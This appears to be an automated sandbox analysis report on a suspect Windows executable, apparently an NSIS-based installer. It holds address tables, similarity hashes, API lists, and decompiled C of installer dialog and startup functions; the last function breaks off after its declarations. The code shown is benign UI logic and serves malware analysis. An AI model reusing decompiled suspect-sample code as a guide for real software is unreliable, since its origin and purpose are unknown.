                  0x00406d64
                  0x00406d66
                  0x00406d69
                  0x00406d6d
                  0x00406d6f
                  0x00406d6f
                  0x00406d70
                  0x00406d73
                  0x00406d76
                  0x00406d38
                  0x00406d38
                  0x00406d40
                  0x00406d45
                  0x00406d47
                  0x00406d4a
                  0x00406d4a
                  0x00406d79
                  0x00406d80
                  0x00406d0a
                  0x00406d0a
                  0x00406d0a
                  0x00406d0a
                  0x00000000
                  0x00406d82
                  0x00000000
                  0x00406d82
                  0x00406d80
                  0x00406c93
                  0x00406c96
                  0x00406c98
                  0x00406c9b
                  0x00406c9e
                  0x00406ca1
                  0x00406ca3
                  0x00406ca6
                  0x00406ca9
                  0x00406ca9
                  0x00406cac
                  0x00406cac
                  0x00406caf
                  0x00406cb6
                  0x00406c8a
                  0x00406c8a
                  0x00406c8a
                  0x00406c8a
                  0x00000000
                  0x00406cb8
                  0x00000000
                  0x00406cb8
                  0x00406cb6
                  0x00406c3c
                  0x00406c3f
                  0x00406c41
                  0x00406c44
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406b2e
                  0x00406b2e
                  0x00406b32
                  0x00406ff8
                  0x00000000
                  0x00406ff8
                  0x00406b38
                  0x00406b3b
                  0x00406b3e
                  0x00406b41
                  0x00406b43
                  0x00406b43
                  0x00406b43
                  0x00406b46
                  0x00406b49
                  0x00406b4c
                  0x00406b4f
                  0x00406b52
                  0x00406b55
                  0x00406b56
                  0x00406b58
                  0x00406b58
                  0x00406b58
                  0x00406b5b
                  0x00406b5e
                  0x00406b61
                  0x00406b64
                  0x00406b64
                  0x00406b64
                  0x00406b67
                  0x00000000
                  0x00000000
                  0x00406dab
                  0x00406dab
                  0x00406dab
                  0x00406daf
                  0x00000000
                  0x00000000
                  0x00406db5
                  0x00406db8
                  0x00406dbb
                  0x00406dbe
                  0x00406dc0
                  0x00406dc0
                  0x00406dc0
                  0x00406dc3
                  0x00406dc6
                  0x00406dc9
                  0x00406dcc
                  0x00406dcf
                  0x00406dd2
                  0x00406dd3
                  0x00406dd5
                  0x00406dd5
                  0x00406dd5
                  0x00406dd8
                  0x00406ddb
                  0x00406dde
                  0x00406de1
                  0x00406de4
                  0x00406de8
                  0x00406dea
                  0x00406ded
                  0x00000000
                  0x00406def
                  0x00000000
                  0x00406def
                  0x00406ded
                  0x00407022
                  0x00000000
                  0x00000000
                  0x00406651

                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 634db48916f7a97cd593a88a8f27a2a6a53995630c6979533469a6cf2a501d9c
                  • Instruction ID: b77f02bc2ee5da486f1689b8d44b34109ba54b696cf3d27aba4845a127c97f42
                  • Opcode Fuzzy Hash: 634db48916f7a97cd593a88a8f27a2a6a53995630c6979533469a6cf2a501d9c
                  • Instruction Fuzzy Hash: CEF17671D00269CBCF28CFA8C8946ADBBB0FF44305F25856ED856BB281D7385A86CF44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00403C71, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 84%
                  			E00403C71(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x420d10 = _t35;
					if(_t116 == 0x110) {
						 *0x424728 = _t126;
						 *0x420d24 = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41fcf0 = _t92;
						E00404145(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x423f08); // executed
						 *0x423eec = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x420d10 = 1;
					}
					_t123 =  *0x40a1dc; // 0xffffffff
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x424760;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E00404191(0x40b);
						while(1) {
							_t37 =  *0x420d10;
							 *0x40a1dc =  *0x40a1dc + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1dc; // 0xffffffff
							__eflags = _t39 -  *0x424764;
							if(_t39 ==  *0x424764) {
								E0040140B(1);
							}
							__eflags =  *0x423eec - _t134; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a1dc -  *0x424764; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E00406154(_t117, _t126, _t131, 0x42c800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E00404145(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E00404145(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E00404145(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x4247cc - _t134;
							_v32 = _t49;
							if( *0x4247cc != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008);
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
							E00404167(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x41fcf0, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x4247cc - _t134;
							if( *0x4247cc == _t134) {
								_push( *0x420d24);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x41fcf0);
							}
							E0040417A();
							E004060C1(0x420d28, E00403C52());
							E00406154(0x420d28, _t126, _t131,  &(0x420d28[lstrlenA(0x420d28)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x420d28);
							_push(_t134);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x423ef8);
									 *0x420500 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x424720,  *_t131 +  *0x423f00 & 0x0000ffff, _t126,  *(0x40a1e0 +  *(_t131 + 4) * 4), _t131);
									__eflags = _t74 - _t134;
									 *0x423ef8 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E00404145(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x423ef8, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									_push(_t134);
									E00401389( *((intOrPtr*)(_t131 + 0xc)));
									__eflags =  *0x423eec - _t134; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x423ef8, 8);
									E00404191(0x405);
									goto L58;
								}
								__eflags =  *0x4247cc - _t134;
								if( *0x4247cc != _t134) {
									goto L61;
								}
								__eflags =  *0x4247c0 - _t134;
								if( *0x4247c0 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423ef8);
						 *0x424728 = _t134;
						EndDialog(_t126,  *0x4200f8);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x423ef8, 0x40f, 0, 1);
						__eflags =  *0x423eec - _t134; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x420d08, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420d08,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E004041AC(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x423ef8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x4247cc - _t134;
										if( *0x4247cc == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x4200f8 = 1;
											L21:
											_push(0x78);
											L22:
											E0040411E();
											goto L26;
										}
										E0040140B(_t128);
										 *0x4200f8 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1dc - _t134; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x423ef8);
						 *0x423ef8 = _a12;
						L58:
						if( *0x421d28 == _t134) {
							_t143 =  *0x423ef8 - _t134; // 0x0
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa);
								 *0x421d28 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}































                  0x00403c7a
                  0x00403c83
                  0x00403dc4
                  0x00403dc8
                  0x00403dcc
                  0x00403dce
                  0x00403dd3
                  0x00403dde
                  0x00403de9
                  0x00403dee
                  0x00403df0
                  0x00403df2
                  0x00403df5
                  0x00403dfa
                  0x00403e08
                  0x00403e15
                  0x00403e1c
                  0x00403e1c
                  0x00403e1d
                  0x00403e1d
                  0x00403e22
                  0x00403e28
                  0x00403e2f
                  0x00403e35
                  0x00403e37
                  0x00403e77
                  0x00403e7c
                  0x00403e81
                  0x00403e81
                  0x00403e86
                  0x00403e8f
                  0x00403e91
                  0x00403e96
                  0x00403e9c
                  0x00403ea0
                  0x00403ea0
                  0x00403ea5
                  0x00403eab
                  0x00000000
                  0x00000000
                  0x00403eb6
                  0x00403ebc
                  0x00000000
                  0x00000000
                  0x00403ec5
                  0x00403ecd
                  0x00403ed2
                  0x00403ed5
                  0x00403edb
                  0x00403ee0
                  0x00403ee3
                  0x00403ee9
                  0x00403eee
                  0x00403ef1
                  0x00403ef7
                  0x00403eff
                  0x00403f05
                  0x00403f0b
                  0x00403f0f
                  0x00403f16
                  0x00403f16
                  0x00403f16
                  0x00403f20
                  0x00403f32
                  0x00403f3e
                  0x00403f43
                  0x00403f4d
                  0x00403f53
                  0x00403f55
                  0x00403f5a
                  0x00403f57
                  0x00403f57
                  0x00403f57
                  0x00403f6a
                  0x00403f82
                  0x00403f84
                  0x00403f8a
                  0x00403f9f
                  0x00403f8c
                  0x00403f95
                  0x00403f97
                  0x00403f97
                  0x00403fa5
                  0x00403fb6
                  0x00403fc7
                  0x00403fce
                  0x00403fd4
                  0x00403fd8
                  0x00403fdd
                  0x00403fdf
                  0x00000000
                  0x00403fe5
                  0x00403fe5
                  0x00403fe7
                  0x00000000
                  0x00000000
                  0x00403fed
                  0x00403ff1
                  0x00404016
                  0x0040401c
                  0x00404022
                  0x00404024
                  0x00000000
                  0x00000000
                  0x0040404a
                  0x00404050
                  0x00404052
                  0x00404057
                  0x00000000
                  0x00000000
                  0x0040405d
                  0x00404060
                  0x00404063
                  0x0040407a
                  0x00404086
                  0x0040409f
                  0x004040a5
                  0x004040a9
                  0x004040ae
                  0x004040b4
                  0x00000000
                  0x00000000
                  0x004040be
                  0x004040c9
                  0x00000000
                  0x004040c9
                  0x00403ff3
                  0x00403ff9
                  0x00000000
                  0x00000000
                  0x00403fff
                  0x00404005
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040400b
                  0x00403fdf
                  0x004040d6
                  0x004040e2
                  0x004040e9
                  0x00000000
                  0x00403e39
                  0x00403e39
                  0x00403e3c
                  0x00403e6f
                  0x00403e6f
                  0x00403e71
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403e71
                  0x00403e3e
                  0x00403e42
                  0x00403e47
                  0x00403e49
                  0x00000000
                  0x00000000
                  0x00403e59
                  0x00403e61
                  0x00000000
                  0x00403e67
                  0x00403c95
                  0x00403c95
                  0x00403c99
                  0x00403c9e
                  0x00403cad
                  0x00403cad
                  0x00403cb6
                  0x00403cbf
                  0x00403cca
                  0x00403cca
                  0x00403cd6
                  0x00403cf2
                  0x00403cf5
                  0x00403d08
                  0x00403d0e
                  0x00403db1
                  0x00000000
                  0x00403dba
                  0x00403d14
                  0x00403d21
                  0x00403d23
                  0x00403d25
                  0x00403d44
                  0x00403d44
                  0x00403d47
                  0x00403d4c
                  0x00403d4f
                  0x00403d5f
                  0x00403d60
                  0x00403d62
                  0x00403d98
                  0x00403dab
                  0x00000000
                  0x00403dab
                  0x00403d64
                  0x00403d6a
                  0x00403d83
                  0x00403d88
                  0x00403d8a
                  0x00000000
                  0x00000000
                  0x00403d8c
                  0x00403d78
                  0x00403d78
                  0x00403d7a
                  0x00403d7a
                  0x00000000
                  0x00403d7a
                  0x00403d6d
                  0x00403d72
                  0x00000000
                  0x00403d72
                  0x00403d51
                  0x00403d57
                  0x00000000
                  0x00000000
                  0x00403d59
                  0x00000000
                  0x00403d59
                  0x00403d49
                  0x00000000
                  0x00403d49
                  0x00403d2f
                  0x00403d36
                  0x00403d3c
                  0x00403d3e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403d3e
                  0x00403cfa
                  0x00000000
                  0x00403cd8
                  0x00403cde
                  0x00403ce8
                  0x004040ef
                  0x004040f5
                  0x004040f7
                  0x004040fd
                  0x00404102
                  0x00404108
                  0x00404108
                  0x004040fd
                  0x00404112
                  0x00000000
                  0x00404112
                  0x00403cd6

                  APIs
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CAD
                  • ShowWindow.USER32(?), ref: 00403CCA
                  • DestroyWindow.USER32 ref: 00403CDE
                  • SetWindowLongA.USER32 ref: 00403CFA
                  • GetDlgItem.USER32 ref: 00403D1B
                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D2F
                  • IsWindowEnabled.USER32(00000000), ref: 00403D36
                  • GetDlgItem.USER32 ref: 00403DE4
                  • GetDlgItem.USER32 ref: 00403DEE
                  • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403E08
                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E59
                  • GetDlgItem.USER32 ref: 00403EFF
                  • ShowWindow.USER32(00000000,?), ref: 00403F20
                  • EnableWindow.USER32(?,?), ref: 00403F32
                  • EnableWindow.USER32(?,?), ref: 00403F4D
                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F63
                  • EnableMenuItem.USER32 ref: 00403F6A
                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403F82
                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403F95
                  • lstrlenA.KERNEL32(00420D28,?,00420D28,00000000), ref: 00403FBF
                  • SetWindowTextA.USER32(?,00420D28), ref: 00403FCE
                  • ShowWindow.USER32(?,0000000A), ref: 00404102
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                  • String ID: (B
                  • API String ID: 4050669955-3831730363
                  • Opcode ID: 7a58bff379e853cca07bcf65810b410c125cf819e0a5c8acdf48496fe53637fe
                  • Instruction ID: b3becc50dc3ae915ab1c9f271a4527fb908fa7fae9a455a684dda11466253fc4
                  • Opcode Fuzzy Hash: 7a58bff379e853cca07bcf65810b410c125cf819e0a5c8acdf48496fe53637fe
                  • Instruction Fuzzy Hash: 77C11071600204BFDB206F61ED49E2B3AB8FB85706F50053EF651B51F1CB799982AB2D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004038D4, Relevance: 49.2, APIs: 14, Strings: 14, Instructions: 215stringregistryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 96%
                  			E004038D4(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				signed short _t67;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x424734;
				_t17 = E004064CA(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x420d28;
					"1033" = 0x30;
					 *0x42b001 = 0x78;
					 *0x42b002 = 0;
					E00405FA8(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420d28, 0);
					__eflags =  *0x420d28;
					if(__eflags == 0) {
						E00405FA8(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x420d28, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					_t67 =  *_t17(); // executed
					E0040601F("1033", _t67 & 0x0000ffff);
				}
				E00403B99(_t71, _t84);
				_t80 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x4247c0 =  *0x42473c & 0x00000020;
				 *0x4247dc = 0x10000;
				if(E00405B47(_t84, "C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405B47(_t92, _t80) == 0) {
						E00406154(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
					}
					_t25 = LoadImageA( *0x424720, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423f08 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403B99(_t71, __eflags);
							__eflags =  *0x4247e0;
							if( *0x4247e0 != 0) {
								_t28 = E004052BA(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x423eec; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420d08, 5); // executed
							_t34 = E0040645C("RichEd20"); // executed
							__eflags = _t34;
							if(_t34 == 0) {
								E0040645C("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x423ec0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423ec0);
								 *0x423ee4 = _t81;
								RegisterClassA(0x423ec0);
							}
							_t36 =  *0x423f00; // 0x0
							_t39 = DialogBoxParamA( *0x424720, _t36 + 0x00000069 & 0x0000ffff, 0, E00403C71, 0); // executed
							E00403824(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x424720;
						 *0x423ec4 = E00401000;
						 *0x423ed0 =  *0x424720;
						 *0x423ed4 = _t25;
						 *0x423ee4 = 0x40a1f4;
						if(RegisterClassA(0x423ec0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x420d08 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x424720, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x4236c0;
					E00405FA8(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x424778, 0x4236c0, 0);
					_t57 =  *0x4236c0; // 0x4d
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x4236c1;
						 *((char*)(E00405A84(0x4236c1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E004060C1(_t80, E00405A59(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405AA0(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}


























                  0x004038da
                  0x004038e3
                  0x004038ea
                  0x004038ec
                  0x00403900
                  0x00403912
                  0x00403919
                  0x00403920
                  0x00403926
                  0x0040392b
                  0x00403931
                  0x00403944
                  0x00403944
                  0x0040394f
                  0x004038ee
                  0x004038ee
                  0x004038f9
                  0x004038f9
                  0x00403954
                  0x0040395e
                  0x00403967
                  0x0040396c
                  0x0040397d
                  0x00403a04
                  0x00403a0c
                  0x00403a15
                  0x00403a15
                  0x00403a2b
                  0x00403a31
                  0x00403a3f
                  0x00403ac0
                  0x00403ac8
                  0x00403ad2
                  0x00403ad7
                  0x00403add
                  0x00403b67
                  0x00403b6c
                  0x00403b6e
                  0x00403b8a
                  0x00000000
                  0x00403b8a
                  0x00403b70
                  0x00403b76
                  0x00403b7e
                  0x00403b7e
                  0x00000000
                  0x00403b76
                  0x00403aeb
                  0x00403af6
                  0x00403afb
                  0x00403afd
                  0x00403b04
                  0x00403b04
                  0x00403b0f
                  0x00403b17
                  0x00403b19
                  0x00403b1b
                  0x00403b24
                  0x00403b27
                  0x00403b2d
                  0x00403b2d
                  0x00403b33
                  0x00403b4c
                  0x00403b5d
                  0x00000000
                  0x00403b62
                  0x00403aca
                  0x00403acc
                  0x00000000
                  0x00403a41
                  0x00403a41
                  0x00403a4d
                  0x00403a57
                  0x00403a5d
                  0x00403a62
                  0x00403a71
                  0x00403b8f
                  0x00403b8f
                  0x00000000
                  0x00403b8f
                  0x00403a80
                  0x00403abb
                  0x00000000
                  0x00403abb
                  0x00403983
                  0x00403983
                  0x00403986
                  0x00403988
                  0x00000000
                  0x00000000
                  0x00403992
                  0x004039a2
                  0x004039a7
                  0x004039ae
                  0x00000000
                  0x00000000
                  0x004039b2
                  0x004039b4
                  0x004039c1
                  0x004039c1
                  0x004039c9
                  0x004039cf
                  0x004039f7
                  0x004039ff
                  0x00000000
                  0x004039e1
                  0x004039e2
                  0x004039eb
                  0x004039f1
                  0x004039f2
                  0x00000000
                  0x004039f2
                  0x004039ed
                  0x004039ef
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004039ef
                  0x004039cf

                  APIs
                    • Part of subcall function 004064CA: GetModuleHandleA.KERNEL32(?,?,?,00403385,0000000B), ref: 004064DC
                    • Part of subcall function 004064CA: GetProcAddress.KERNEL32(00000000,?), ref: 004064F7
                  • GetUserDefaultUILanguage.KERNELBASE(00000002,74B5FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SviRsoKz6E.exe" ,00000000), ref: 004038EE
                    • Part of subcall function 0040601F: wsprintfA.USER32 ref: 0040602C
                  • lstrcatA.KERNEL32(1033,00420D28,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D28,00000000,00000002,74B5FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SviRsoKz6E.exe" ,00000000), ref: 0040394F
                  • lstrlenA.KERNEL32(Mfkeoxlzmclr,?,?,?,Mfkeoxlzmclr,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D28,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D28,00000000,00000002,74B5FA90), ref: 004039C4
                  • lstrcmpiA.KERNEL32(?,.exe,Mfkeoxlzmclr,?,?,?,Mfkeoxlzmclr,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D28,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D28,00000000), ref: 004039D7
                  • GetFileAttributesA.KERNEL32(Mfkeoxlzmclr), ref: 004039E2
                  • LoadImageA.USER32 ref: 00403A2B
                  • RegisterClassA.USER32 ref: 00403A68
                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403A80
                  • CreateWindowExA.USER32 ref: 00403AB5
                  • ShowWindow.USER32(00000005,00000000), ref: 00403AEB
                  • GetClassInfoA.USER32 ref: 00403B17
                  • GetClassInfoA.USER32 ref: 00403B24
                  • RegisterClassA.USER32 ref: 00403B2D
                  • DialogBoxParamA.USER32 ref: 00403B4C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                  • String ID: "C:\Users\user\Desktop\SviRsoKz6E.exe" $(B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$Mfkeoxlzmclr$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                  • API String ID: 606308-1296934445
                  • Opcode ID: ca874c65e5546124d3cd3d782fc2237607ef3cb7aa3e488bb88335414d52c5b7
                  • Instruction ID: 8119f10372a92e3ad89c0c28339df669361e1c2b2a074a7ad4fa5a04607ec86b
                  • Opcode Fuzzy Hash: ca874c65e5546124d3cd3d782fc2237607ef3cb7aa3e488bb88335414d52c5b7
                  • Instruction Fuzzy Hash: CC61B4703402446ED620AF65AD45F3B3AACEB8574AF40053FF991B62E3CB7D5D029A2D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00402EA1, Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 78%
                  			E00402EA1(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				long _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				long _t70;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				void* _t85;
				signed int _t87;
				void* _t89;
				long _t90;
				long _t93;
				void* _t94;

